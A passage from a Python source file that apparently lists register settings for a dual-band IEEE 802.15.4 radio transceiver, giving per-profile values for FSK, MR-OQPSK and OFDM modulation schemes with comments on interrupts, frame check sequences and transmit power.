(RG_RF09_RXDFE, 0x25), # RCUT = 1 , SR = 5
(RG_RF09_AGCC, 0x01),
(RG_RF09_AGCS, 0x37),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x83),
(RG_RF09_TXDFE, 0x94),
(RG_RF09_PAC, 0x74), # // Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. 0x14~8 dBm
(RG_BBC0_IRQM, 0x12), # TXFE and RXFE interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x15), # // NO FCS FILTER in RX, FCS automatically added in TX, 32 bits FCS, FSK.
(RG_BBC0_FSKDM, 0x01), # //Direct modulation enabled and Pre-emphasis disabled.
(RG_BBC0_FSKC0, 0xD6),
(RG_BBC0_FSKC1, 0x01),
# (RG_BBC0_FSKC2, 0x41), # NRNSC and Interleaving
(RG_BBC0_FSKC3, 0x85),
(RG_BBC0_FSKC4, 0x00), # //FEC disabled. IEEE MODE
(RG_BBC0_FSKPE0, 0x0E),
(RG_BBC0_FSKPE1, 0x0F),
(RG_BBC0_FSKPE2, 0xF0),
(RG_BBC0_FSKPHRTX, 0x08)], # using SDF1
# fsk_option3
'4fsk_200kbps_400kHz': [
(RG_RF09_CMD, 0x02), # //we make sure we are in the trxoff state
(RG_RF09_IRQM, 0x1F), # // TRXERR, BATLOW, EDC, TRXRDY, WAKEUP interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x03), # //IFS 1, 200 kHz
(RG_RF09_RXDFE, 0x25), # # RCUT = 2 , SR = 4
(RG_RF09_AGCC, 0x01),
(RG_RF09_AGCS, 0x37),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x83),
(RG_RF09_TXDFE, 0x94),
(RG_RF09_PAC, 0x74), # Tx power in lower 5 bits (max 0x1F); 0x74 -> TXPWR=0x14 (~8 dBm)
(RG_BBC0_IRQM, 0x12), # TXFE, RXEM, RXAM, RXFE, RXFS interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x15), # no FCS filter in RX, FCS automatically added in TX, 32-bit FCS, FSK
(RG_BBC0_FSKDM, 0x01), # direct modulation enabled, pre-emphasis disabled
(RG_BBC0_FSKSDF0L, 0xEB),
(RG_BBC0_FSKSDF0H, 0xAA),
# (RG_BBC0_FSKSDF1L, 0xAE),
# (RG_BBC0_FSKSDF1H, 0xBF),
(RG_BBC0_FSKC0, 0xD7),
(RG_BBC0_FSKC1, 0x01), # 1 = 200 kHz symbol rate, 3 = 400 kHz
# (RG_BBC0_FSKC2, 0x41), # NRNSC and Interleaving
(RG_BBC0_FSKC3, 0x85),
(RG_BBC0_FSKC4, 0x20), # FEC disabled
(RG_BBC0_FSKPE0, 0x0E),
(RG_BBC0_FSKPE1, 0x0F),
(RG_BBC0_FSKPE2, 0xF0),
(RG_BBC0_FSKPHRTX, 0x00)],
# oqpsk_rate0
'oqpsk_6.25kbps_600kHz': [
(RG_BBC0_PC, 0x17),
(RG_BBC0_OQPSKPHRTX, 0x00), # MR-OQPSK, rate mode 0
(RG_BBC0_OQPSKC0, 0x10), # 100kchips/s, RC-0.8 shaping, direct-modulation enabled
(RG_BBC0_OQPSKC1, 0xB8), # MINIMUM preamble-detection sensitivity for SUN-O-QPSK, MAXIMUM for legacy OQPSK, rx-override enabled
(RG_BBC0_OQPSKC2, 0x04), # listen for MR-OQPSK frames only
(RG_BBC0_OQPSKC3, 0x00), # legacy OQPSK, search for SFD_1 only
(RG_BBC0_IRQM, 0x13), # TXFE, RXFE, RXFS interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_RF09_IRQM, 0x12), # TRXERR, TRXRDY interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x00), # Rx BW 160 kHz, IF 250 kHz
(RG_RF09_RXDFE, 0x2A),
(RG_RF09_AGCC, 0x21),
(RG_RF09_EDD, 0x2B),
(RG_RF09_AGCS, 0x77),
(RG_RF09_TXCUTC, 0xC7), # .PARAMP = 3, .LPFCUT = 7
(RG_RF09_TXDFE, 0x7A), # .SR = 0xA, .RCUT = 3
(RG_RF09_PAC, 0x75)], # Tx power in lower 5 bits (max 0x1F); 0x75 -> TXPWR=0x15 (~8 dBm)
# oqpsk_rate1
'oqpsk_12.5kbps_600kHz': [
(RG_BBC0_PC, 0x17),
(RG_BBC0_OQPSKPHRTX, 0x02), # MR-OQPSK, rate mode 1
(RG_BBC0_OQPSKC0, 0x10), # 100kchips/s, RC-0.8 shaping, direct-modulation enabled
(RG_BBC0_OQPSKC1, 0xB8), # MINIMUM preamble-detection sensitivity for SUN-O-QPSK, MAXIMUM for legacy OQPSK, rx-override enabled
(RG_BBC0_OQPSKC2, 0x00), # listen for MR-OQPSK frames only
(RG_BBC0_OQPSKC3, 0x00), # legacy OQPSK, search for SFD_1 only
(RG_BBC0_IRQM, 0x13), # TXFE, RXFE, RXFS interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_RF09_IRQM, 0x12), # TRXERR, TRXRDY interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x00), # Rx BW 160 kHz, IF 250 kHz
(RG_RF09_RXDFE, 0x2A),
(RG_RF09_AGCC, 0x21),
(RG_RF09_EDD, 0x2B),
(RG_RF09_AGCS, 0x77),
(RG_RF09_TXCUTC, 0xC7), # .PARAMP = 3, .LPFCUT = 7
(RG_RF09_TXDFE, 0x7A), # .SR = 0xA, .RCUT = 3
(RG_RF09_PAC, 0x75)], # Tx power in lower 5 bits (max 0x1F); 0x75 -> TXPWR=0x15 (~8 dBm)
# oqpsk_rate2
'oqpsk_25kbps_600kHz': [
(RG_BBC0_PC, 0x17),
(RG_BBC0_OQPSKPHRTX, 0x04), # MR-OQPSK, rate mode 2
(RG_BBC0_OQPSKC0, 0x10), # 100 kchips/s, RC-0.8 shaping, direct-modulation enabled
(RG_BBC0_OQPSKC1, 0xB8), # MINIMUM preamble-detection sensitivities, rx-override disabled
(RG_BBC0_OQPSKC2, 0x04), # listen for MR-OQPSK frames only
(RG_BBC0_OQPSKC3, 0x00), # legacy OQPSK, search for SFD_1 only
(RG_BBC0_IRQM, 0x13), # TXFE, RXFE, RXFS interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_RF09_IRQM, 0x12), # TRXERR, TRXRDY interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x00), # Rx BW 160 kHz, IF 250 kHz
(RG_RF09_RXDFE, 0x2A),
(RG_RF09_AGCC, 0x21),
(RG_RF09_EDD, 0x2B),
(RG_RF09_AGCS, 0x77),
(RG_RF09_TXCUTC, 0xC7), # .PARAMP = 3, .LPFCUT = 7
(RG_RF09_TXDFE, 0x7A), # .SR = 0xA, .RCUT = 3
(RG_RF09_PAC, 0x75)], # Tx power in lower 5 bits (max 0x1F); 0x75 -> TXPWR=0x15 (~8 dBm)
# oqpsk_rate3
'oqpsk_50kbps_600kHz': [
(RG_BBC0_PC, 0x17),
(RG_BBC0_OQPSKPHRTX, 0x06), # MR-OQPSK, rate mode 3
(RG_BBC0_OQPSKC0, 0x10), # 100 kchips/s, RC-0.8 shaping, direct-modulation enabled
(RG_BBC0_OQPSKC1, 0xB8), # MINIMUM preamble-detection sensitivities, rx-override disabled
(RG_BBC0_OQPSKC2, 0x00), # listen for MR-OQPSK frames only
(RG_BBC0_OQPSKC3, 0x00), # legacy OQPSK, search for SFD_1 only
(RG_BBC0_IRQM, 0x13), # TXFE, RXFE, RXFS interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_RF09_IRQM, 0x12), # TRXERR, TRXRDY interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x00), # Rx BW 160 kHz, IF 250 kHz
(RG_RF09_RXDFE, 0x2A),
(RG_RF09_AGCC, 0x21),
(RG_RF09_EDD, 0x2B),
(RG_RF09_AGCS, 0x77),
(RG_RF09_TXCUTC, 0xC7), # .PARAMP = 3, .LPFCUT = 7
(RG_RF09_TXDFE, 0x7A), # .SR = 0xA, .RCUT = 3
(RG_RF09_PAC, 0x75)], # Tx power in lower 5 bits (max 0x1F); 0x75 -> TXPWR=0x15 (~8 dBm)
# subGHz_ofdm_1_mcs0
'subGHz_ofdm_100kbps_1200kHz_mcs0': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x19),
(RG_RF09_RXDFE, 0x83),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x0A), # recommended value (0x0B)
(RG_RF09_TXDFE, 0x83),
(RG_RF09_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x00),
(RG_BBC0_OFDMPHRTX, 0x00)],
# subGHz_ofdm_1_mcs1
'subGHz_ofdm_200kbps_1200kHz_mcs1': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x19),
(RG_RF09_RXDFE, 0x83),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x0A), # recommended value (0x0B)
(RG_RF09_TXDFE, 0x83),
(RG_RF09_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x00),
(RG_BBC0_OFDMPHRTX, 0x01)],
# subGHz_ofdm_1_mcs2
'subGHz_ofdm_400kbps_1200kHz_mcs2': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x19),
(RG_RF09_RXDFE, 0x83),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x0A), # recommended value (0x0B)
(RG_RF09_TXDFE, 0x83),
(RG_RF09_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x00),
(RG_BBC0_OFDMPHRTX, 0x02)],
# subGHz_ofdm_1_mcs3
'subGHz_ofdm_800kbps_1200kHz_mcs3': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x19),
(RG_RF09_RXDFE, 0x83),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x0A), # recommended value (0x0B)
(RG_RF09_TXDFE, 0x83),
(RG_RF09_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x00),
(RG_BBC0_OFDMPHRTX, 0x03)],
# subGHz_ofdm_2_mcs0
'subGHz_ofdm_50kbps_800kHz_mcs0': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x17),
(RG_RF09_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x08), # recommended value ()
(RG_RF09_TXDFE, 0x63),
(RG_RF09_PAC, 0x7C), # Tx power in lower 5 bits (max 0x1F); 0x7C -> TXPWR=0x1C (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x01),
(RG_BBC0_OFDMPHRTX, 0x00)],
# subGHz_ofdm_2_mcs1
'subGHz_ofdm_100kbps_800kHz_mcs1': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x17),
(RG_RF09_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x08), # recommended value ()
(RG_RF09_TXDFE, 0x63),
(RG_RF09_PAC, 0x7C), # Tx power in lower 5 bits (max 0x1F); 0x7C -> TXPWR=0x1C (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x01),
(RG_BBC0_OFDMPHRTX, 0x01)],
# subGHz_ofdm_2_mcs2
'subGHz_ofdm_200kbps_800kHz_mcs2': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x17),
(RG_RF09_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x08), # recommended value ()
(RG_RF09_TXDFE, 0x63),
(RG_RF09_PAC, 0x7C), # Tx power in lower 5 bits (max 0x1F); 0x7C -> TXPWR=0x1C (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x01),
(RG_BBC0_OFDMPHRTX, 0x02)],
# subGHz_ofdm_2_mcs3
'subGHz_ofdm_400kbps_800kHz_mcs3': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x17),
(RG_RF09_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x08), # recommended value ()
(RG_RF09_TXDFE, 0x63),
(RG_RF09_PAC, 0x7C), # Tx power in lower 5 bits (max 0x1F); 0x7C -> TXPWR=0x1C (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x01),
(RG_BBC0_OFDMPHRTX, 0x03)],
# subGHz_ofdm_2_mcs4
'subGHz_ofdm_600kbps_800kHz_mcs4': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x17),
(RG_RF09_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x08), # recommended value ()
(RG_RF09_TXDFE, 0x63),
(RG_RF09_PAC, 0x7C), # Tx power in lower 5 bits (max 0x1F); 0x7C -> TXPWR=0x1C (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x01),
(RG_BBC0_OFDMPHRTX, 0x04)],
# subGHz_ofdm_2_mcs5
'subGHz_ofdm_800kbps_800kHz_mcs5': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x17),
(RG_RF09_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x08), # recommended value ()
(RG_RF09_TXDFE, 0x63),
(RG_RF09_PAC, 0x7C), # Tx power in lower 5 bits (max 0x1F); 0x7C -> TXPWR=0x1C (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x01),
(RG_BBC0_OFDMPHRTX, 0x05)],
# subGHz_ofdm_3_mcs1
'subGHz_ofdm_50kbps_400kHz_mcs1': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x04),
(RG_RF09_RXDFE, 0x46),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x05), # recommended value ()
(RG_RF09_TXDFE, 0x66),
(RG_RF09_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x02),
(RG_BBC0_OFDMPHRTX, 0x01)],
# subGHz_ofdm_3_mcs2
'subGHz_ofdm_100kbps_400kHz_mcs2': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x04),
(RG_RF09_RXDFE, 0x46),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x05), # recommended value ()
(RG_RF09_TXDFE, 0x66),
(RG_RF09_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x02),
(RG_BBC0_OFDMPHRTX, 0x02)],
# subGHz_ofdm_3_mcs3
'subGHz_ofdm_200kbps_400kHz_mcs3': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x04),
(RG_RF09_RXDFE, 0x46),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x05), # recommended value ()
(RG_RF09_TXDFE, 0x66),
(RG_RF09_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x02),
(RG_BBC0_OFDMPHRTX, 0x03)],
# subGHz_ofdm_3_mcs4
'subGHz_ofdm_300kbps_400kHz_mcs4': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x04),
(RG_RF09_RXDFE, 0x46),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x05), # recommended value ()
(RG_RF09_TXDFE, 0x66),
(RG_RF09_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x02),
(RG_BBC0_OFDMPHRTX, 0x04)],
# subGHz_ofdm_3_mcs5
'subGHz_ofdm_400kbps_400kHz_mcs5': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x04),
(RG_RF09_RXDFE, 0x46),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x05), # recommended value ()
(RG_RF09_TXDFE, 0x66),
(RG_RF09_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x02),
(RG_BBC0_OFDMPHRTX, 0x05)],
# subGHz_ofdm_3_mcs6
'subGHz_ofdm_600kbps_400kHz_mcs6': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x04),
(RG_RF09_RXDFE, 0x46),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x05), # recommended value ()
(RG_RF09_TXDFE, 0x66),
(RG_RF09_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x02),
(RG_BBC0_OFDMPHRTX, 0x06)],
# subGHz_ofdm_4_mcs2
'subGHz_ofdm_50kbps_200kHz_mcs2': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x12),
(RG_RF09_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x03), # recommended value ()
(RG_RF09_TXDFE, 0x46),
(RG_RF09_PAC, 0x7B), # Tx power in lower 5 bits (max 0x1F); 0x7B -> TXPWR=0x1B (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x03),
(RG_BBC0_OFDMPHRTX, 0x02)],
# subGHz_ofdm_4_mcs3
'subGHz_ofdm_100kbps_200kHz_mcs3': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x12),
(RG_RF09_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x03), # recommended value ()
(RG_RF09_TXDFE, 0x46),
(RG_RF09_PAC, 0x7B), # Tx power in lower 5 bits (max 0x1F); 0x7B -> TXPWR=0x1B (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x03),
(RG_BBC0_OFDMPHRTX, 0x03)],
# subGHz_ofdm_4_mcs4
'subGHz_ofdm_150kbps_200kHz_mcs4': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x12),
(RG_RF09_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x03), # recommended value ()
(RG_RF09_TXDFE, 0x46),
(RG_RF09_PAC, 0x7B), # Tx power in lower 5 bits (max 0x1F); 0x7B -> TXPWR=0x1B (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x03),
(RG_BBC0_OFDMPHRTX, 0x04)],
# subGHz_ofdm_4_mcs5
'subGHz_ofdm_200kbps_200kHz_mcs5': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x12),
(RG_RF09_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x03), # recommended value ()
(RG_RF09_TXDFE, 0x46),
(RG_RF09_PAC, 0x7B), # Tx power in lower 5 bits (max 0x1F); 0x7B -> TXPWR=0x1B (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x03),
(RG_BBC0_OFDMPHRTX, 0x05)],
# subGHz_ofdm_4_mcs6
'subGHz_ofdm_300kbps_200kHz_mcs6': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x12),
(RG_RF09_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x03), # recommended value ()
(RG_RF09_TXDFE, 0x46),
(RG_RF09_PAC, 0x7B), # Tx power in lower 5 bits (max 0x1F); 0x7B -> TXPWR=0x1B (~8 dBm)
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x03),
(RG_BBC0_OFDMPHRTX, 0x06)],
# legacy
'oqpsk_250kbps_2000kHz': [
(RG_BBC1_PC, 0x1F),
(RG_BBC1_OQPSKPHRTX, 0x09), # legacy O-QPSK
(RG_BBC1_OQPSKC0, 0x03), # 2000 kchips/s
(RG_BBC1_OQPSKC1, 0x47), # MINIMUM preamble-detection sensitivities, rx-override enabled
(RG_BBC1_OQPSKC2, 0x05), # FCS type legacy (16-bit) & listen for LEG-OQPSK frames only
(RG_BBC1_OQPSKC3, 0x00), # legacy OQPSK, search for SFD_1 only
(RG_BBC0_IRQM, 0x00), # BBC0 interrupts disabled
(RG_BBC1_IRQM, 0x13), # TXFE, RXFE, RXFS interrupts enabled
(RG_RF09_IRQM, 0x00), # RF09 interrupts disabled
(RG_RF24_IRQM, 0x12), # TRXERR, TRXRDY interrupts enabled
(RG_RF24_RXBWC, 0x0B), # Rx BW 2000 kHz, IF 2000 kHz
(RG_RF24_RXDFE, 0x41),
(RG_RF24_AGCC, 0x01),
(RG_RF24_EDD, 0x13),
(RG_RF24_AGCS, 0x77),
(RG_RF24_TXCUTC, 0x0B), # .PARAMP = 0, .LPFCUT = 0xB
(RG_RF24_TXDFE, 0x81), # .SR = 1, .RCUT = 4
(RG_RF24_PAC, 0x75)], # Tx power in lower 5 bits (max 0x1F); 0x75 -> TXPWR=0x15 (~8 dBm)
# 2400MHz_ofdm_1_mcs0
'2400MHz_ofdm_100kbps_1200kHz_mcs0': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x1A),
(RG_RF24_RXDFE, 0x83),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x0A), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x83),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x1E), # NO FCS FILTER in RX, FCS automatically added in TX, FCS 2 bytes
(RG_BBC1_OFDMC, 0x00),
(RG_BBC1_OFDMPHRTX, 0x00)],
# 2400MHz_ofdm_1_mcs1
'2400MHz_ofdm_200kbps_1200kHz_mcs1': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x1A),
(RG_RF24_RXDFE, 0x83),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x0A), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x83),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x1E), # NO FCS FILTER in RX, FCS automatically added in TX, FCS 2 bytes
(RG_BBC1_OFDMC, 0x00),
(RG_BBC1_OFDMPHRTX, 0x01)],
# 2400MHz_ofdm_1_mcs2
'2400MHz_ofdm_400kbps_1200kHz_mcs2': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x1A),
(RG_RF24_RXDFE, 0x83),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x0A), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x83),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
